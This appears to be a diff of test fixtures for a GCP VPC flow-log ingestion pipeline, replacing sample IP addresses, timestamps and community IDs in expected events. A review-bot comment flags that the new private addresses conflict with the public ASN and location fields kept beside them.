@@ -4428,8 +4428,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868570Z", - "original": "{\"insertId\":\"1ulp77rfdvho5p\",\"jsonPayload\":{\"bytes_sent\":\"1541638\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.101\",\"src_port\":49680},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:55.705469925Z\",\"packets_sent\":\"949\",\"reporter\":\"DEST\",\"rtt_msec\":\"113\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"siem-windows\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"windows-isolated\",\"vpc_name\":\"windows-isolated\"},\"start_time\":\"2019-06-14T03:39:59.711043814Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "ingested": "2021-12-09T13:37:46.391390400Z", + "original": 
"{\"insertId\":\"1ulp77rfdvho5p\",\"jsonPayload\":{\"bytes_sent\":\"1541638\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":49680},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:55.705469925Z\",\"packets_sent\":\"949\",\"reporter\":\"DEST\",\"rtt_msec\":\"113\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"siem-windows\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"windows-isolated\",\"vpc_name\":\"windows-isolated\"},\"start_time\":\"2019-06-14T03:39:59.711043814Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.711043814Z", "end": "2019-06-14T03:49:55.705469925Z", @@ -4456,18 +4456,18 @@ "as": { "number": 15169 }, - "address": "192.0.2.177", + "address": "192.168.2.177", "port": 60112, "bytes": 755901, "domain": "suricata-iowa", - "ip": "192.0.2.177", + "ip": "192.168.2.177", "packets": 227 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:h6NgISKzvTiBXyH4aX48ebaiTiY=", + "community_id": "1:tEFDnW0zs/Y86QZ+V6iUmdJfre4=", "bytes": 755901, "name": "default", "transport": "tcp", @@ -4489,7 +4489,7 @@ }, "related": { "ip": [ - "192.0.2.177", + "192.168.2.177", "10.139.99.242" ] }, 
@@ -4526,8 +4526,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868573300Z", - "original": "{\"insertId\":\"1ulp77rfdvho4y\",\"jsonPayload\":{\"bytes_sent\":\"755901\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"192.0.2.177\",\"src_port\":60112},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:18.224268993Z\",\"packets_sent\":\"227\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"suricata-iowa\",\"zone\":\"us-central1-a\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:14.031541248Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "ingested": "2021-12-09T13:37:46.391396100Z", + "original": 
"{\"insertId\":\"1ulp77rfdvho4y\",\"jsonPayload\":{\"bytes_sent\":\"755901\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"192.168.2.177\",\"src_port\":60112},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:18.224268993Z\",\"packets_sent\":\"227\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"suricata-iowa\",\"zone\":\"us-central1-a\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:14.031541248Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:40:14.031541248Z", "end": "2019-06-14T03:49:18.224268993Z", @@ -4548,10 +4548,10 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33558, "domain": "kibana", - "ip": "203.0.113.134" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -4565,7 +4565,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:dH+LewCyUH2MeBfvw4hfqQCcruA=", + "community_id": "1:OXveH9jdApjuJYvfxS0cJZ8eAbI=", "bytes": 248715, "name": "default", "transport": "tcp", @@ -4588,7 +4588,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.134" + "67.43.156.13" ] }, "gcp": { 
@@ -4624,8 +4624,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868576700Z", - "original": "{\"insertId\":\"1ulp77rfdvho4o\",\"jsonPayload\":{\"bytes_sent\":\"248715\",\"connection\":{\"dest_ip\":\"203.0.113.134\",\"dest_port\":33558,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.394676451Z\",\"packets_sent\":\"270\",\"reporter\":\"SRC\",\"rtt_msec\":\"144\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:58.492572765Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "ingested": "2021-12-09T13:37:46.391401600Z", + "original": 
"{\"insertId\":\"1ulp77rfdvho4o\",\"jsonPayload\":{\"bytes_sent\":\"248715\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33558,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.394676451Z\",\"packets_sent\":\"270\",\"reporter\":\"SRC\",\"rtt_msec\":\"144\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:58.492572765Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:39:58.492572765Z", "end": "2019-06-14T03:49:56.394676451Z", @@ -4654,17 +4654,17 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 65316, "bytes": 69757, - "ip": "203.0.113.58", + "ip": "67.43.156.13", "packets": 709 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:inMMyMxBckhL35Xh3+nNKgSc4qA=", + "community_id": "1:dJhBeC2A7KY1uJpWS48QzGUUwxY=", "bytes": 69757, "transport": "tcp", "type": "ipv4", @@ -4678,7 +4678,7 @@ }, "related": { "ip": [ - "203.0.113.58", + "67.43.156.13", "10.139.99.242" ] }, 
@@ -4703,8 +4703,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868581Z", - "original": "{\"insertId\":\"1ulp77rfdvho5g\",\"jsonPayload\":{\"bytes_sent\":\"69757\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.58\",\"src_port\":65316},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220838853Z\",\"packets_sent\":\"709\",\"reporter\":\"DEST\",\"rtt_msec\":\"86\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.565831992Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "ingested": "2021-12-09T13:37:46.391407100Z", + "original": 
"{\"insertId\":\"1ulp77rfdvho5g\",\"jsonPayload\":{\"bytes_sent\":\"69757\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65316},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220838853Z\",\"packets_sent\":\"709\",\"reporter\":\"DEST\",\"rtt_msec\":\"86\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.565831992Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.565831992Z", "end": "2019-06-14T03:49:56.220838853Z", @@ -4733,17 +4733,17 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 65263, "bytes": 69440, - "ip": "203.0.113.58", + "ip": "67.43.156.13", "packets": 728 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:z1VfQro/CzS/3/Jcw7ACjDX47kM=", + "community_id": "1:NVPn1fsNGKIWh4nC6Og4qM8A3kY=", "bytes": 69440, "transport": "tcp", "type": "ipv4", @@ -4757,7 +4757,7 @@ }, "related": { "ip": [ - "203.0.113.58", + "67.43.156.13", "10.139.99.242" ] }, 
@@ -4782,8 +4782,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868584200Z", - "original": "{\"insertId\":\"1ulp77rfdvho59\",\"jsonPayload\":{\"bytes_sent\":\"69440\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.58\",\"src_port\":65263},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220748025Z\",\"packets_sent\":\"728\",\"reporter\":\"DEST\",\"rtt_msec\":\"87\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:01.270990648Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "ingested": "2021-12-09T13:37:46.391412500Z", + "original": 
"{\"insertId\":\"1ulp77rfdvho59\",\"jsonPayload\":{\"bytes_sent\":\"69440\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65263},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220748025Z\",\"packets_sent\":\"728\",\"reporter\":\"DEST\",\"rtt_msec\":\"87\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:01.270990648Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:40:01.270990648Z", "end": "2019-06-14T03:49:56.220748025Z", @@ -4810,17 +4810,17 @@ "as": { "number": 15169 }, - "address": "192.0.2.117", + "address": "192.168.2.117", "port": 50438, "bytes": 1457, - "ip": "192.0.2.117", + "ip": "192.168.2.117", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:W4ijXBQBwNbGcf7z2YuONE7/Z8I=", + "community_id": "1:+C/3qZp81mU+xJgorNlBHR/BmTE=", "bytes": 1457, "transport": "tcp", "type": "ipv4", @@ -4834,7 +4834,7 @@ }, "related": { "ip": [ - "192.0.2.117", + "192.168.2.117", "10.87.40.76" ] }, 
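Review bot: `192.168.2.117` in the new `address`/`ip` values of the `-4810` hunk is an RFC 1918 private address, yet the same event keeps `"as": { "number": 15169 }` and, in the following hunk's raw `original` log, a `src_location` with country and ASN — a private source carrying public routing metadata is unlikely in a real VPC flow log and makes the fixture self-contradictory. The replaced `192.0.2.117` was a TEST-NET-1 documentation address, so this reads like a slip while moving fixtures onto allow-listed public ranges; if a public external client was intended, an unused address from the range the rest of this file now uses (for example `67.43.156.15`) keeps the event consistent, and if a private peer was intended the `as.number`/location fields should be dropped from the input log so the expected output reflects that. The same pattern recurs with `192.168.2.165` and ASN 45899 in the `-4960` hunk. Any geo/ASN enrichment in the pipeline (not visible here) would also never fire on a private address, so that path silently loses coverage.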
@@ -4859,8 +4859,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868588Z", - "original": "{\"insertId\":\"1ulp77rfdvho57\",\"jsonPayload\":{\"bytes_sent\":\"1457\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"192.0.2.117\",\"src_port\":50438},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:40:20.569744903Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:40:20.454046087Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "ingested": "2021-12-09T13:37:46.391417900Z", + "original": 
"{\"insertId\":\"1ulp77rfdvho57\",\"jsonPayload\":{\"bytes_sent\":\"1457\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"192.168.2.117\",\"src_port\":50438},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:40:20.569744903Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:40:20.454046087Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:40:20.454046087Z", "end": "2019-06-14T03:40:20.569744903Z", @@ -4881,9 +4881,9 @@ "as": { "number": 15169 }, - "address": "192.0.2.117", + "address": "192.168.2.117", "port": 50438, - "ip": "192.0.2.117" + "ip": "192.168.2.117" }, "source": { "address": "10.87.40.76", @@ -4897,7 +4897,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:W4ijXBQBwNbGcf7z2YuONE7/Z8I=", + "community_id": "1:+C/3qZp81mU+xJgorNlBHR/BmTE=", "bytes": 1784, "transport": "tcp", "type": "ipv4", @@ -4912,7 +4912,7 @@ "related": { "ip": [ "10.87.40.76", - "192.0.2.117" + "192.168.2.117" ] }, "gcp": { 
@@ -4936,8 +4936,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868591300Z", - "original": "{\"insertId\":\"1ulp77rfdvho5e\",\"jsonPayload\":{\"bytes_sent\":\"1784\",\"connection\":{\"dest_ip\":\"192.0.2.117\",\"dest_port\":50438,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:40:20.569744903Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.454046087Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "ingested": "2021-12-09T13:37:46.391423500Z", + "original": 
"{\"insertId\":\"1ulp77rfdvho5e\",\"jsonPayload\":{\"bytes_sent\":\"1784\",\"connection\":{\"dest_ip\":\"192.168.2.117\",\"dest_port\":50438,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:40:20.569744903Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.454046087Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:40:20.454046087Z", "end": "2019-06-14T03:40:20.569744903Z", @@ -4960,9 +4960,9 @@ "as": { "number": 45899 }, - "address": "192.0.2.165", + "address": "192.168.2.165", "port": 59623, - "ip": "192.0.2.165" + "ip": "192.168.2.165" }, "source": { "address": "10.139.99.242", @@ -4976,7 +4976,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:n2izIhQ6f30pRxm58NLCxNXryuI=", + "community_id": "1:FsRs9Upw/72M8FLScc+hnC6ByYQ=", "bytes": 2395, "transport": "tcp", "type": "ipv4", @@ -4991,7 +4991,7 @@ "related": { "ip": [ "10.139.99.242", - "192.0.2.165" + "192.168.2.165" ] }, "gcp": { 
@@ -5015,8 +5015,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868594500Z", - "original": "{\"insertId\":\"1ulp77rfdvho4d\",\"jsonPayload\":{\"bytes_sent\":\"2395\",\"connection\":{\"dest_ip\":\"192.0.2.165\",\"dest_port\":59623,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":22},\"dest_location\":{\"asn\":45899,\"city\":\"Vĩnh Yên\",\"continent\":\"Asia\",\"country\":\"vnm\",\"region\":\"Vinh Phuc Province\"},\"end_time\":\"2019-06-14T03:40:52.361155668Z\",\"packets_sent\":\"11\",\"reporter\":\"SRC\",\"rtt_msec\":\"233\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:46.541094678Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "ingested": "2021-12-09T13:37:46.391427700Z", + "original": "{\"insertId\":\"1ulp77rfdvho4d\",\"jsonPayload\":{\"bytes_sent\":\"2395\",\"connection\":{\"dest_ip\":\"192.168.2.165\",\"dest_port\":59623,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":22},\"dest_location\":{\"asn\":45899,\"city\":\"Vĩnh Yên\",\"continent\":\"Asia\",\"country\":\"vnm\",\"region\":\"Vinh Phuc 
Province\"},\"end_time\":\"2019-06-14T03:40:52.361155668Z\",\"packets_sent\":\"11\",\"reporter\":\"SRC\",\"rtt_msec\":\"233\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:46.541094678Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:40:46.541094678Z", "end": "2019-06-14T03:40:52.361155668Z", @@ -5043,18 +5043,18 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33558, "bytes": 60335, "domain": "kibana", - "ip": "203.0.113.134", + "ip": "67.43.156.13", "packets": 353 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:dH+LewCyUH2MeBfvw4hfqQCcruA=", + "community_id": "1:OXveH9jdApjuJYvfxS0cJZ8eAbI=", "bytes": 60335, "name": "default", "transport": "tcp", @@ -5076,7 +5076,7 @@ }, "related": { "ip": [ - "203.0.113.134", + "67.43.156.13", "10.139.99.242" ] }, 
